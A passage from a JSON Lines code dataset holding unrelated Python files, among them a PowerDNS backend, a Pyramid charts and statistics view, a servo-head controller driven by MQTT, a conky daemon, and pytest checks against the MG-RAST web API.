record['type'],\n 'content': record['data'],\n 'ttl': record['ttl'],\n 'prio': record['priority']\n })\n\n record_m.save(self.session)\n\n def update_record(self, context, domain, record):\n record_m = self._get_record(record['id'])\n\n record_m.update({\n 'name': record['name'].rstrip('.'),\n 'type': record['type'],\n 'content': record['data'],\n 'ttl': record['ttl'],\n 'prio': record['priority']\n })\n\n record_m.save(self.session)\n\n def delete_record(self, context, domain, record):\n record_m = self._get_record(record['id'])\n record_m.delete(self.session)\n\n def _build_soa_content(self, domain):\n return \"%s %s. %d %d %d %d %d\" % (domain['name'],\n domain['email'].replace(\"@\", \".\"),\n domain['serial'],\n domain['refresh'],\n domain['retry'],\n domain['expire'],\n domain['minimum'])\n\n def _get_domain(self, domain_id):\n query = self.session.query(Domain)\n\n try:\n domain = query.filter_by(moniker_id=domain_id).one()\n except sqlalchemy_exceptions.NoResultFound:\n raise exceptions.Backend('No domain found')\n except sqlalchemy_exceptions.MultipleResultsFound:\n raise exceptions.Backend('Too many domains found')\n else:\n return domain\n\n def _get_record(self, record_id=None, domain=None, type=None):\n query = self.session.query(Record)\n\n if record_id:\n query = query.filter_by(moniker_id=record_id)\n\n if type:\n query = query.filter_by(type=type)\n\n if domain:\n query = query.filter_by(domain_id=domain.id)\n\n try:\n record = query.one()\n except sqlalchemy_exceptions.NoResultFound:\n raise exceptions.Backend('No record found')\n except sqlalchemy_exceptions.MultipleResultsFound:\n raise exceptions.Backend('Too many records found')\n else:\n return record\n","sub_path":"moniker/backend/impl_powerdns.py","file_name":"impl_powerdns.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135106543","text":"from geoalchemy2 import functions as geofunctions\nfrom pyramid.httpexceptions import HTTPNotFound\nfrom pyramid.renderers import render_to_response\nfrom pyramid.testing import DummyRequest\nfrom pyramid.view import view_config\nfrom sqlalchemy import cast, Float, func, distinct, select\nfrom webob.multidict import MultiDict\n\nfrom lokp.config.customization import get_customized_template_path\nfrom lokp.models import Stakeholder, SH_Tag_Group, SH_Tag, SH_Key, SH_Value, \\\n DBSession, Activity, A_Tag_Group, A_Tag, A_Key, A_Value, Language, \\\n Profile, Involvement\nfrom lokp.protocols.activity_protocol import ActivityProtocol\nfrom lokp.protocols.stakeholder_protocol import StakeholderProtocol\nfrom lokp.utils.views import validate_item_type, get_current_locale, \\\n get_current_profile\nfrom lokp.views.base import BaseView\nfrom lokp.views.translation import get_profiles, get_translated_db_keys\n\n\nclass ChartsView(BaseView):\n\n @view_config(route_name='charts_overview')\n def charts_overview(self):\n\n return render_to_response(\n get_customized_template_path(self.request, 'charts_view.mak'),\n self.get_base_template_values(), self.request)\n\n @view_config(route_name='charts')\n @view_config(route_name='charts_no_slash')\n def charts(self):\n\n template_values = self.template_values\n\n chart_type = self.request.matchdict.get('type', 'bars')\n if chart_type == 'bars':\n params = self.request.matchdict.get('params')\n if params == ('sh',):\n template = 'barchart_sh'\n else:\n template = 'barchart_a'\n elif chart_type == 'stackedbars':\n template = 'stackedbarchart'\n elif chart_type == 'map':\n template = 'mapchart'\n profiles = sorted(get_profiles(), key=lambda profile: profile[0])\n profiles.append(('global', 'global'))\n template_values.update({\n 'profiles': profiles\n })\n else:\n return HTTPNotFound()\n\n attr = self.request.params.get('attr', 0)\n\n template_values.update({\n 'attr': attr\n })\n\n return render_to_response(\n get_customized_template_path(\n self.request, 'charts/%s.mak' % template),\n template_values, self.request)\n\n\nclass EvaluationView(BaseView):\n\n @view_config(route_name='evaluation', renderer='json')\n def evaluation(self, data=None):\n\n ret = {'success': False}\n\n json_data = self.request.json_body if data is None else data\n if json_data is None:\n ret['msg'] = 'No data provided'\n return ret\n\n if validate_item_type(json_data.get('item', 'a')) == 'sh':\n self.db_item = Stakeholder\n self.db_taggroup = SH_Tag_Group\n self.db_tag = SH_Tag\n self.db_key = SH_Key\n self.db_value = SH_Value\n self.protocol = StakeholderProtocol(DBSession)\n else:\n self.db_item = Activity\n self.db_taggroup = A_Tag_Group\n self.db_tag = A_Tag\n self.db_key = A_Key\n self.db_value = A_Value\n self.protocol = ActivityProtocol(DBSession)\n\n # Make sure the json is valid\n if 'group_by' not in json_data:\n ret['msg'] = \"Missing parameter 'group by': At least one column \"\n \"needs to be specified.\"\n return ret\n if not isinstance(json_data['group_by'], list):\n ret['msg'] = \"Parameter 'group by' needs to be an array.\"\n return ret\n if 'attributes' not in json_data:\n ret['msg'] = \"Missing attributes: No attributes were specified.\"\n return ret\n for attr in json_data['attributes']:\n test, msg = self._check_function(\n json_data['attributes'][attr], attr)\n if test is not True:\n ret['msg'] = msg\n return ret\n if 'locales' in json_data and not isinstance(\n json_data['locales'], list):\n ret['msg'] = \"Parameter 'locales' needs to be an array.\"\n return ret\n translate_keys = json_data.get('translate', {}).get('keys', [])\n if translate_keys and not isinstance(translate_keys, list):\n ret['msg'] = \"Parameter 'translate[\\'keys\\']' needs to be an \"\n \"array.\"\n return ret\n # for k in translate_keys:\n # if not isinstance(k, list):\n # ret['msg'] = \"Value of 'translate[\\'keys\\']' needs to be \"\n # \"an array of arrays.\"\n # return ret\n a_ids = json_data.get('a_ids', [])\n if not isinstance(a_ids, list):\n ret['msg'] = \"Parameter 'a_ids' needs to be an array.\"\n return ret\n # for i in a_ids:\n # if not isinstance(i, str):\n # ret['msg'] = \"Entries of parameter 'a_ids' need to be \"\n # \"strings (the UUIDs of Activities)\"\n # return ret\n sh_ids = json_data.get('sh_ids', [])\n if not isinstance(sh_ids, list):\n ret['msg'] = \"Parameter 'sh_ids' needs to be an array.\"\n return ret\n # for i in sh_ids:\n # if not isinstance(i, str):\n # ret['msg'] = \"Entries of parameter 'sh_ids' need to be \"\n # \"strings (the UUIDs of Stakeholders)\"\n # return ret\n if self.db_item == Activity:\n this_id_filter = a_ids\n other_id_filter = sh_ids\n else:\n this_id_filter = sh_ids\n other_id_filter = a_ids\n\n this_filter = []\n other_filter = []\n if 'filter' in json_data:\n params = []\n for filters in json_data.get('filter', '').split('&'):\n try:\n f = filters.split('=')\n if len(f) == 2:\n params.append((f[0], f[1]))\n except:\n pass\n # Simulate a request to send the filters\n req = DummyRequest()\n req.params = MultiDict(params)\n a_tag_filter, __, sh_tag_filter, __ = self.protocol._filter(req)\n if self.db_item == Activity:\n this_filter = a_tag_filter\n other_filter = sh_tag_filter\n else:\n this_filter = sh_tag_filter\n other_filter = a_tag_filter\n\n isInvolvementRequired = (\n self.db_item == Stakeholder\n or len(other_filter) + len(other_id_filter) > 0)\n\n # Collect all keys to be translated (values are translated in the\n # query)\n locales = ['default']\n langs = []\n locales.extend(json_data.get('locales', []))\n translated_keys = {}\n exclude_from_translation = ['Activity', 'Stakeholder']\n keys = []\n for key, __ in json_data.get('attributes', {}).items():\n if key not in exclude_from_translation and key not in keys:\n keys.append(key)\n for key in json_data.get('group_by', []):\n if key not in exclude_from_translation and key not in keys:\n keys.append(key)\n for key in translate_keys:\n for k in key:\n if k not in keys:\n keys.append(k)\n for l in locales:\n locale = l\n if l == 'default':\n locale = get_current_locale(self.request)\n db_lang = DBSession.query(Language).filter(\n Language.locale == locale).first()\n langs.append((l, db_lang))\n translated_keys[l] = get_translated_db_keys(\n self.db_key, keys, db_lang)\n\n # Get groups\n groups_subqueries, groups_columns = self._get_group_by(\n json_data['group_by'], langs)\n\n # Get functions\n functions_subqueries, functions_columns = \\\n self._get_attribute_functions(json_data['attributes'])\n\n # Prepare basic query\n q = DBSession.query(*groups_columns + functions_columns). \\\n join(self.db_taggroup). \\\n join(self.db_item)\n\n # Join with further groups\n for g_sq in groups_subqueries[1:]:\n q = q.outerjoin(g_sq, g_sq.c.item_id == self.db_item.id)\n\n # Join with functions\n for f_sq in functions_subqueries:\n q = q.outerjoin(f_sq, f_sq.c.item_id == self.db_item.id)\n\n # Apply status filter (fix: active)\n q = q.filter(self.db_item.fk_status == 2)\n\n if (this_id_filter):\n q = q.filter(self.db_item.identifier.in_(this_id_filter))\n\n # Apply filters\n filter_subqueries = self.protocol.Session.query(\n self.db_item.id.label('a_filter_id')\n )\n for x in this_filter:\n # Collect the IDs for each filter\n taggroups_sq = x.subquery()\n single_subquery = self.protocol.Session.query(\n self.db_item.id.label('a_filter_id')\n ). \\\n join(self.db_taggroup). \\\n join(taggroups_sq,\n taggroups_sq.c.a_filter_tg_id == self.db_taggroup.id). \\\n subquery()\n # Join each found ID with previously found IDs\n filter_subqueries = filter_subqueries. \\\n join(single_subquery,\n single_subquery.c.a_filter_id == self.db_item.id)\n filter_subqueries = filter_subqueries.subquery()\n q = q.join(\n filter_subqueries,\n filter_subqueries.c.a_filter_id == self.db_item.id)\n\n # Apply profile boundary filter\n if self.db_item == Activity:\n p = json_data.get('profile', get_current_profile(self.request))\n profile = DBSession.query(Profile). \\\n filter(Profile.code == p). \\\n first()\n if profile is not None:\n q = q.filter(geofunctions.ST_Intersects(\n self.db_item.point, profile.geometry))\n\n # Apply grouping and ordering\n q = q.group_by(*groups_columns). \\\n order_by(groups_columns[0])\n\n if isInvolvementRequired:\n if self.db_item == Stakeholder:\n inv_subquery = DBSession.query(\n Involvement.fk_stakeholder.label('id')\n ). \\\n join(Activity). \\\n filter(Activity.fk_status == 2)\n p = json_data.get('profile', get_current_profile(self.request))\n profile = DBSession.query(Profile). \\\n filter(Profile.code == p). \\\n first()\n if profile is not None:\n inv_subquery = inv_subquery.filter(geofunctions.ST_Intersects(\n Activity.point, profile.geometry))\n other_db_item = Activity\n other_db_taggroup = A_Tag_Group\n else:\n inv_subquery = DBSession.query(\n Involvement.fk_activity.label('id')\n ). \\\n join(Stakeholder). \\\n filter(Stakeholder.fk_status == 2)\n other_db_item = Stakeholder\n other_db_taggroup = SH_Tag_Group\n\n if (other_id_filter):\n inv_subquery = inv_subquery.filter(\n other_db_item.identifier.in_(other_id_filter))\n\n # Apply filters\n filter_subqueries = self.protocol.Session.query(\n other_db_item.id.label('a_filter_id')\n )\n\n for x in other_filter:\n # Collect the IDs for each filter\n taggroups_sq = x.subquery()\n try:\n single_subquery = self.protocol.Session.query(\n other_db_item.id.label('a_filter_id')\n ). \\\n join(other_db_taggroup). \\\n join(taggroups_sq,\n taggroups_sq.c.a_filter_tg_id == other_db_taggroup.id). \\\n subquery()\n except AttributeError:\n single_subquery = self.protocol.Session.query(\n other_db_item.id.label('a_filter_id')\n ). \\\n join(other_db_taggroup). \\\n join(taggroups_sq,\n taggroups_sq.c.sh_filter_tg_id == other_db_taggroup.id). \\\n subquery()\n # Join each found ID with previously found IDs\n filter_subqueries = filter_subqueries. \\\n join(single_subquery,\n single_subquery.c.a_filter_id == other_db_item.id)\n\n filter_subqueries = filter_subqueries.subquery()\n inv_subquery = inv_subquery.join(\n filter_subqueries,\n filter_subqueries.c.a_filter_id == other_db_item.id)\n\n inv_subquery = inv_subquery.subquery()\n q = q.filter(self.db_item.id.in_(\n select([inv_subquery.c.id])\n ))\n\n data = []\n for res in q.all():\n data = _handle_single_line(\n data, res, json_data.get('group_by'),\n json_data.get('attributes'), translated_keys)\n\n # Do a translation of groupable if available\n groupable_translated = []\n for key in translate_keys:\n translations = []\n for k in key:\n t = {\n 'key': k,\n 'default': k\n }\n for locale, key_translations in translated_keys.items():\n translation = (\n None if k not in exclude_from_translation else k)\n for k_t in key_translations:\n if len(k_t) >= 2 and k_t[0] == k:\n translation = k_t[1]\n t[locale] = translation\n translations.append(t)\n groupable_translated.append(translations)\n if len(groupable_translated):\n ret.update({\n 'translate': {'keys': groupable_translated}\n })\n\n ret.update({\n 'success': True,\n 'data': data\n })\n\n return ret\n\n def _get_group_by(self, group_by, langs):\n \"\"\"\n Returns\n - an array with SubQueries\n - an array with Columns to select from\n \"\"\"\n subqueries = []\n columns = []\n for i, group_key in enumerate(group_by):\n # first one different\n if i == 0:\n subquery = DBSession.query(\n self.db_value.value.label('v'),\n self.db_tag.fk_tag_group.label('tg_id')\n ). \\\n join(\n self.db_tag,\n self.db_tag.fk_value == self.db_value.id). \\\n join(self.db_key, self.db_key.id == self.db_tag.fk_key). \\\n filter(self.db_key.key == group_key). \\\n filter(self.db_key.fk_language == None)\n else:\n subquery = DBSession.query(\n self.db_item.id.label('item_id'),\n self.db_value.value.label('v'),\n ). \\\n join(\n self.db_taggroup,\n self.db_taggroup.fk_item == self.db_item.id). \\\n join(\n self.db_tag,\n self.db_taggroup.id == self.db_tag.fk_tag_group). \\\n join(\n self.db_value,\n self.db_value.id == self.db_tag.fk_value). \\\n join(self.db_key, self.db_key.id == self.db_tag.fk_key). \\\n filter(self.db_key.key == group_key). \\\n filter(self.db_key.fk_language == None)\n for l in langs:\n __, value_translation = self.protocol._get_translatedKV(\n l[1], self.db_key, self.db_value)\n subquery = subquery.add_columns(\n value_translation.c.value_translated.label(l[0]))\n subquery = subquery. \\\n outerjoin(\n value_translation,\n value_translation.c.value_original_id ==\n self.db_value.id)\n subquery = subquery.subquery()\n\n subqueries.append(subquery)\n\n columns.append(subquery.c.v)\n for l in langs:\n columns.append(subquery.c[l[0]])\n\n return subqueries, columns\n\n def _get_attribute_functions(self, attributes):\n \"\"\"\n Returns\n - an array with SubQueries\n - an array with Columns to select from\n \"\"\"\n subqueries = []\n columns = []\n for attr in attributes:\n function = attributes[attr]\n if function == 'sum':\n sq = DBSession.query(\n self.db_item.id.label('item_id'),\n cast(self.db_value.value, Float).label('v')\n ). \\\n join(self.db_taggroup). \\\n join(\n self.db_tag,\n self.db_taggroup.id == self.db_tag.fk_tag_group). \\\n join(\n self.db_value,\n self.db_value.id == self.db_tag.fk_value). \\\n join(self.db_key, self.db_key.id == self.db_tag.fk_key). \\\n filter(self.db_key.key == attr). \\\n subquery()\n subqueries.append(sq)\n columns.append(func.sum(sq.c.v))\n elif function == 'count' or function == 'count distinct':\n if attr == 'Activity' or attr == 'Stakeholder':\n columns.append(func.count())\n else:\n sq = DBSession.query(\n self.db_item.id.label('item_id'),\n self.db_value.value.label('v')\n ). \\\n join(self.db_taggroup). \\\n join(\n self.db_tag,\n self.db_taggroup.id == self.db_tag.fk_tag_group). \\\n join(self.db_value). \\\n join(self.db_key). \\\n filter(self.db_key.key == attr). \\\n subquery()\n subqueries.append(sq)\n if (function == 'count distinct'):\n columns.append(func.count(distinct(sq.c.v)))\n else:\n columns.append(func.count(sq.c.v))\n return subqueries, columns\n\n def _check_function(self, function, attr):\n \"\"\"\n Returns True if a function is predefined and if targeted\n attribute is of valid type (where needed)\n \"\"\"\n if function == 'sum':\n if self._cast_to_number(attr):\n return True, ''\n else:\n return False, \"Invalid type for function '%s': '%s' should \"\n \"contain only number values.\" % (function, attr)\n if function == 'count':\n return True, ''\n if function == 'count distinct':\n return True, ''\n else:\n return False,\n \"Unknown function: '%s' is not a predefined function.\" % function\n\n def _cast_to_number(self, key):\n \"\"\"\n Returns True if the given key has number values\n \"\"\"\n q = DBSession.query(cast(self.db_value.value, Float)). \\\n join(self.db_tag). \\\n join(self.db_key). \\\n filter(self.db_key.key == key)\n try:\n q.all()\n return True\n except:\n return False\n\n\ndef _handle_single_line(\n data, res_total, group_by, attributes, translated_keys):\n\n group_by_res = res_total[:len(group_by) * (len(translated_keys) + 1)]\n attributes_res = res_total[len(group_by) * (len(translated_keys) + 1):]\n\n entry = None\n\n for e in data:\n if e.get('group', {}).get('value', {}).get('value') == group_by_res[0]:\n entry = e\n\n if entry is None:\n\n default = group_by[0]\n for k in translated_keys.get('default', []):\n if len(k) >= 2 and k[0] == group_by[0]:\n default = k[1]\n entry = {\n 'group': {\n 'key': {\n 'key': group_by[0],\n 'default': default\n },\n 'value': {\n 'value': group_by_res[0],\n 'default': (\n group_by_res[1] if group_by_res[1] is not None\n else group_by_res[0])\n }\n }\n }\n\n i = 0\n for locale, key_translations in translated_keys.items():\n # Key\n if locale == 'default':\n continue\n t = None\n for k in key_translations:\n if len(k) >= 2 and k[0] == group_by[0]:\n t = k[1]\n entry.get('group', {}).get('key', {})[locale] = t\n # Value\n entry.get('group', {}).get('value', {})[locale] = (\n group_by_res[i + 2])\n i += 1\n\n data.append(entry)\n\n rest_res = res_total[2:]\n rest_group_by = group_by[1:]\n if len(rest_res) > len(attributes_res) and len(rest_group_by):\n entry_data = entry.get('children', [])\n entry['children'] = _handle_single_line(\n entry_data, rest_res, rest_group_by, attributes, translated_keys)\n else:\n entry_attributes = []\n for i, attr in enumerate(attributes):\n key = {\n 'key': attr,\n 'default': attr\n }\n for locale, key_translations in translated_keys.items():\n t = None if attr not in ['Activity', 'Stakeholder'] else attr\n for k in key_translations:\n if len(k) >= 2 and k[0] == attr:\n t = k[1]\n key[locale] = t\n entry_attributes.append({\n 'key': key,\n 'value': attributes_res[i],\n 'function': attributes[attr]\n })\n entry['values'] = entry_attributes\n\n return data\n","sub_path":"lokp/views/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":22490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"333070380","text":"# -*- coding: utf-8 -*-\n\nimport pytest\n\nfrom wemake_python_styleguide.visitors.wrong_class import (\n RequiredBaseClassViolation,\n WrongClassVisitor,\n)\n\n\ndef test_wrong_base_class(assert_errors, parse_ast_tree):\n \"\"\"Testing that not using explicit base class with forbiden.\"\"\"\n tree = parse_ast_tree(\"\"\"\n class WithoutBase: ...\n \"\"\")\n\n visiter = WrongClassVisitor()\n visiter.visit(tree)\n\n assert_errors(visiter, [RequiredBaseClassViolation])\n\n\n@pytest.mark.parametrize('base', [\n 'object',\n 'dict',\n 'CustomClass',\n 'Multiple, Classes, Mixins',\n 'Custom, keyword=1',\n])\ndef test_regular_base_classes(assert_errors, parse_ast_tree, base):\n \"\"\"Testing that regular base classes work.\"\"\"\n tree = parse_ast_tree(\"\"\"\n class Example({0}): ...\n \"\"\".format(base))\n\n visiter = WrongClassVisitor()\n visiter.visit(tree)\n\n assert_errors(visiter, [])\n","sub_path":"tests/test_visitors/test_wrong_class/test_base_class.py","file_name":"test_base_class.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"191678516","text":"###############################################################################\n# Imports\n\nimport os.path\nimport csv\n\nfrom os import listdir\nfrom os.path import isfile, join\n\n###############################################################################\n\n###############################################################################\n# Main and Functions\n\ndef main():\n\n\tcreate_folder(\"appended_results\")\n\n\tfilenames = find_filenames()\n\n\twith open('appended_results/appended_results.txt', 'w') as outfile:\n\t for fname in filenames:\n\t with open('Data/' + fname) as infile:\n\t outfile.write(infile.read())\n\n\treplace_headers()\n\n\tadd_main_header()\n\n\tdelete_temp_files()\n\n# Iterates through all files in the data folder and finds their filenames.\n\ndef find_filenames():\n\n\tfilenames = [ f for f in listdir(\"Data/\") if isfile(join(\"Data/\",f)) ]\n\n\treturn(filenames)\n\n# Creates a folder to put the results in.\n\ndef create_folder(folder_name):\n\n\tif not os.path.exists(folder_name):\n\t\tos.makedirs(folder_name)\n\n# Gets rid of all of the headers in the file\n\ndef replace_headers():\n\n\tinfile = 'appended_results/appended_results.txt'\n\toutfile = 'appended_results/clean_appended_results.txt'\n\n\tdelete_list = ['N, Q, S, P_0, P_1, P_2, R_1, R_2, A_1, A_2, \\n']\n\tfin = open(infile)\n\tfout = open(outfile, \"w+\")\n\tfor line in fin:\n\t for word in delete_list:\n\t line = line.replace(word, \"\")\n\t fout.write(line)\n\tfin.close()\n\tfout.close()\n\n# Adds the main header to the whole file\n\ndef add_main_header():\n\n\tinfile = 'appended_results/clean_appended_results.txt'\n\toutfile = 'appended_results/final_appended_results.txt'\n\n\tfin = open(infile)\n\tfout = open(outfile, \"w+\")\n\n\tfout.write('N, Q, S, P_0, P_1, P_2, R_1, R_2, A_1, A_2, \\n')\n\n\tfout.write( fin.read() )\n\n# Now we delete the temp files\n\ndef delete_temp_files():\n\n\tos.remove('appended_results/appended_results.txt') \n\tos.remove('appended_results/clean_appended_results.txt') \n\n###############################################################################\n\nif __name__ == \"__main__\":\n main()","sub_path":"_UNUSED/Rearranging_AHHA_data/AHHA_rearranging.py","file_name":"AHHA_rearranging.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"190546424","text":"from gsheet import gsheetService, pd\nfrom os import listdir, getcwd\nfrom os.path import dirname\nfrom customer import checkCustomerRisk, getTimeline, cleanexcel, getCustomerInfo, isValidTimeline\nfrom datetime import datetime\nfrom dotenv import dotenv_values\n\nconfig = dotenv_values(dirname(__file__)+\"/.env\")\nfoldername = config.get('EXCEL')\n\nPATH = dirname(__file__) + f'/{foldername}/'\nfrom pprint import pprint\ndef checkOnefile(file):\n result = []\n excelname = PATH + file\n riskArea = gsheetService()\n customerAllsheet = pd.read_excel(excelname, sheet_name=None).keys()\n customerSheet = [k for k in customerAllsheet if 'Example' not in k]\n customerSheet = [k for k in customerSheet if 'ตัวอย่าง' not in k]\n for j in customerSheet:\n customerData = pd.read_excel(excelname, sheet_name=j)\n customerName = getCustomerInfo(customerData)\n customerData = cleanexcel(customerData)\n customerTimeline = getTimeline(customerData)\n isvalidTl = isValidTimeline(customerTimeline, customerName)\n riskCustomer, riskSheet, risk = checkCustomerRisk(\n customerTimeline, riskArea, customerName)\n # pprint(riskCustomer)\n result.append((file, customerName,isvalidTl, risk, riskCustomer, riskSheet, customerTimeline, customerData.values))\n return result\n\ndef checkOneppl(file):\n result = []\n filename = file[:-2]\n sheet = int(file[-1])\n riskArea = gsheetService()\n excelname = PATH + filename\n customerData = pd.read_excel(excelname, sheet_name=sheet)\n customerName = getCustomerInfo(customerData)\n customerData = cleanexcel(customerData)\n customerTimeline = getTimeline(customerData)\n isvalidTl = isValidTimeline(customerTimeline, customerName)\n riskCustomer, riskSheet, risk = checkCustomerRisk(\n customerTimeline, riskArea, customerName)\n result.extend([filename, customerName,isvalidTl, risk, riskCustomer, riskSheet, customerTimeline, customerData.values])\n return result\n # excelname = PATH + \ndef checkMany(file):\n finalResult = []\n for i in file:\n finalResult.append(checkOnefile(i))\n return finalResult\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"389033887","text":"import paho.mqtt.client as mqtt\nfrom dynamixel_control import Dynamixel\nfrom math import atan2,sqrt,degrees\n# X,Y,Z หมายถึงการหมุนรอบแกน\n\nhost = \"192.168.2.102\" \nport = 1883\n\nportDynamixel = Dynamixel('COM6',1000000) #comport,barudrate\nportDynamixel.connect()\nmotor_type = \"Ax\" #ชนิดของ Motor\n\ndef set_Dynamixel(ID, position):\n portDynamixel.setDeviceMoving(ID, motor_type, position, 1023, 1023)#ID, type, goal position, goal speed, max torque\n\ndef position_known(ID):\n return portDynamixel.getMotorPosition(ID)\n\n\ndef Z_axis(value):\n value = float(value)\n roll = 512\n if int(value) in range(270,360) or int(value) in range(0,90):\n if int(value) in range(270,360):\n roll = (512 + ((value-360) * 3.4))\n elif int(value) in range(0,90):\n roll = (512 + (value*3.4))\n return int(roll)\n\ndef Y_axis(value):\n value = float(value)\n yaw = 512\n if int(value) in range(-90,90):\n if int(value) in range(-90, 0):\n yaw = int(512+(value * -3.4))\n elif int(value) in range(0, 90):\n yaw = int(512-(value * 3.4))\n return int(yaw)\n\ndef X_axis(value):\n value = float(value)\n pitch = 820\n if int(value) in range(-45,45):\n if int(value) in range(-45,0):\n pitch = int((value * 6.8) + 820)\n elif int(value) in range(0,45):\n pitch = int((value * 3.2) + 820)\n return int(pitch)\n\ndef qtoe(x,y,z,w):\n #eular YZX\n R11 = 1-(2*((y*y)+(z*z)))\n R21 = 2*((x*y)+(z*w))\n R31 = 2*((x*z)-(w*y))\n R22 = 1-(2*((x*x)+(w*w)))\n R23 = 2*((y*z)-(w*x))\n C2 = sqrt((R11*R11)+(R31*R31))\n thata_1 = degrees(atan2((R31/-C2),(R11/C2)))\n thata_2 = degrees(atan2((R21),(-C2)))\n thata_3 = degrees(atan2((R23/-C2),(R22/-C2)))\n thata = [thata_1,thata_2,thata_3]\n return thata\n\ndef on_connect(self, client, userdata, rc):\n print(\"MQTT Connected.\")\n self.subscribe(\"/operator/head/rotation\")\n\n\n\ndef on_message(client, userdata,msg):\n global pos_ID2_Past, pos_ID3_Past, pos_ID12_Past, pos_ID2_Now, pos_ID3_Now, pos_ID12_Now\n data_Q = msg.payload.decode(\"utf-8\", \"strict\")\n data_Q = str(data_Q).split(\",\")\n eular = qtoe(float(data_Q[0]),float(data_Q[1]),float(data_Q[2]),float(data_Q[3]))\n Y = eular[0]\n Z = eular[1]+180\n X = eular[2]\n\n print(\"Y \" + str(Y) + \" \" + str(Y_axis(Y)))\n print(\"Z \" + str(Z) + \" \" + str(Z_axis(Z)))\n print(\"X \" + str(X) + \" \" + str(X_axis(X)))\n\n pos_ID2_Now = X_axis(X)\n pos_ID3_Now = Z_axis(Z)\n pos_ID12_Now = Y_axis(Y)\n\n if abs(pos_ID2_Past - pos_ID2_Now) < 100:\n pos_ID2_Past = pos_ID2_Now\n if abs(pos_ID3_Past - pos_ID3_Now) < 100:\n pos_ID3_Past = pos_ID3_Now\n if abs(pos_ID12_Past - pos_ID12_Now) < 100:\n pos_ID12_Past = pos_ID12_Now\n\n set_Dynamixel(3, pos_ID2_Past)\n set_Dynamixel(2, pos_ID3_Past)\n set_Dynamixel(12, pos_ID12_Past)\n\nif __name__ == \"__main__\":\n DynamixelposID2 = position_known(2)\n DynamixelposID3 = position_known(3)\n DynamixelposID12 = position_known(12)\n DynamixelgoalposID2 = position_known(2)\n DynamixelgoalposID3 = position_known(3)\n DynamixelgoalposID12 = position_known(12)\n \n #X\n pos_ID2_Past = 850 \n pos_ID2_Now = 850\n #Z\n pos_ID3_Past = 512 \n pos_ID2_Now = 512\n #Y\n pos_ID12_Past = 512 \n pos_ID12_Now = 512\n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(host)\n client.loop_forever()\n\n\n\n","sub_path":"Vision.Avatar/Dynamixel_control/Avatar_Head.py","file_name":"Avatar_Head.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"473687736","text":"\nimport time\nimport setproctitle\n\nfrom lib.daemon import Daemon\nfrom lib.conky.error import ConkyError\n\nclass ConkyDaemon(Daemon):\n counter = 0\n modules = []\n\n def __init__(self, *args, **kwargs):\n setproctitle.setproctitle('conky-scripts')\n modules = kwargs['modules']\n del kwargs['modules']\n\n kwargs['stdout'] = '/tmp/conky-scripts.out'\n kwargs['stderr'] = '/tmp/conky-scripts.out'\n super(ConkyDaemon, self).__init__(*args, **kwargs)\n\n self.modules = [modclass(modperiod) for (modclass, modperiod) in modules]\n\n def run(self):\n [mod.prepare() for mod in self.modules]\n\n while True:\n for mod in self.modules:\n try:\n mod.try_run(self.counter) \n except Exception as e:\n ConkyError(mod, mod.filename, e).handle()\n time.sleep(1)\n self.counter += 1\n\n def reset_modules(self):\n for mod in self.modules:\n try:\n mod.prepare()\n mod.try_reset()\n except Exception as e:\n ConkyError(mod.obj, mod.filename, e).handle()\n\n","sub_path":"conky_scripts/lib/conky/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"496463072","text":"import os\nfrom subprocess import check_output\nimport pytest\n\n# These tests should be quick\n\n# Rotate through API servers listed in API.server.list\n\ndef read_api_list(filename):\n server_list = []\n if not os.path.isfile(filename):\n return [\"http://api.mg-rast.org\", \"https://api.mg-rast.org\"]\n for l in open(filename).readlines():\n server_list.append(l.strip())\n return server_list\n\nAPIS = read_api_list(\"API.server.list\")\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_utf8_project(API_URL):\n URL = API_URL + '/project/mgp128?verbosity=full'\n a = check_output('''curl '{}' |file -'''.format(URL), shell=True)\n assert b\"UTF-8\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_utf8_metagenome_export(API_URL):\n URL = API_URL + \"/metagenome/mgm4447943.3?verbosity=metadata\"\n a = check_output('''curl '{}' | file -'''.format(URL), shell=True)\n assert b\"UTF-8\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_utf8_metadata_export(API_URL):\n URL = API_URL + \"/metadata/export/mgp128\"\n a = check_output('''curl '{}' | file -'''.format(URL), shell=True)\n assert b\"UTF-8\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_download_partial(API_URL):\n URL = API_URL + \"/download/mgm4447943.3?file=350.1\"\n a = check_output('''curl '{}' | head -n 100 '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"GF8803K01A00MJ\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_annotation_similarity(API_URL):\n URL = API_URL + \"/annotation/similarity/mgm4447943.3?identity=80&type=function&source=KO\"\n a = check_output('''curl '{}' | head -n 10 '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"\\t\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_annotation_sequence(API_URL):\n URL = API_URL + \"/annotation/sequence/mgm4447943.3?evalue=10&type=organism&source=SwissProt\"\n a = check_output('''curl '{}' | head -n 10 '''.format(URL), shell=True)\n assert b\"ERROR\" not in a\n assert b\"\\t\" in a\n\n@pytest.mark.parametrize(\"API_URL\", APIS)\ndef test_blast_result_http(API_URL):\n URL = API_URL + \"/compute/blast/mgm4447943.3?md5=0001c08aa276d154b7696f9758839786\"\n 